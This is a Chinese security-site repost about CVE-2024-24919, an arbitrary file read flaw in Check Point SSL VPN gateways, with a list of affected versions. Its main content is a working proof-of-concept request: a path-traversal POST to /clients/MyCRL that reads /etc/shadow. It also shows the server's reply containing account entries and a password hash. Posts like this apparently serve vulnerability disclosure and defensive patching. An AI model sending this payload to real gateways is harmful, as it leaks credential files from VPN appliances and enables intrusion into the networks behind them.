CVE-2024-24919|CheckPoint Gateway任意文件读取漏洞(POC)

admin 2024年5月30日18:36:49评论50 views字数 1488阅读4分57秒阅读模式

0x00 前言

Check Point Software Technologies Ltd. (www.checkpoint.com.cn) 是全球领先的政府与企业网络安全供应商。 其解决方案对恶意软件、勒索软件和其他类型攻击的捕获率均为业界领先,可保护客户免受第五代网络攻击威胁。

Check Point 提供“Infinity”全面保护多层次安全架构,采用第五代高级威胁防护技术,能够守护企业云端、网络和移动设备中存有的信息。

Check Point 还拥有最为全面和直观的单点控制安全管理系统。Check Point 为 10 万余家大小组织提供安全保护。

0x01 漏洞描述

Check Point SSL VPN 任意文件读取漏洞,远程攻击者通过构造恶意请求读取服务器上的任意文件,造成敏感信息泄露。

0x02 CVE编号

CVE-2024-24919

0x03 影响版本

R77.20 (EOL)

R77.30 (EOL)

R80.10 (EOL)

R80.20 (EOL)

R80.20.x

R80.20SP (EOL)

R80.30 (EOL)

R80.30SP (EOL)

R80.40 (EOL)

R81

R81.10

R81.10.x

R81.20

0x04 漏洞详情

POC:

POST /clients/MyCRL HTTP/1.1Host: xxx.xx.xxContent-Length: 39

aCSHELL/../../../../../../../etc/shadow
HTTP/1.0 200 OKDate: Thu, 30 May 2024 01:38:29 GMTServer: Check Point SVN foundationContent-Type: text/htmlX-UA-Compatible: IE=EmulateIE7Connection: closeX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Length: 505

admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8:::monitor:*:19872:0:99999:8:::root:*:19872:0:99999:7:::nobody:*:19872:0:99999:7:::postfix:*:19872:0:99999:7:::rpm:!!:19872:0:99999:7:::shutdown:*:19872:0:99999:7:::pcap:!!:19872:0:99999:7:::halt:*:19872:0:99999:7:::cp_postgres:*:19872:0:99999:7:::cpep_user:*:19872:0:99999:7:::vcsa:!!:19872:0:99999:7:::_nonlocl:*:19872:0:99999:7:::sshd:*:19872:0:99999:7:::

0x05 参考链接

https://support.checkpoint.com/results/sk/sk182336

https://github.com/c3rrberu5/CVE-2024-24919

原文始发于微信公众号(信安百科):CVE-2024-24919|CheckPoint Gateway任意文件读取漏洞(POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月30日18:36:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-24919|CheckPoint Gateway任意文件读取漏洞(POC)https://cn-sec.com/archives/2796653.html

发表评论

匿名网友 填写信息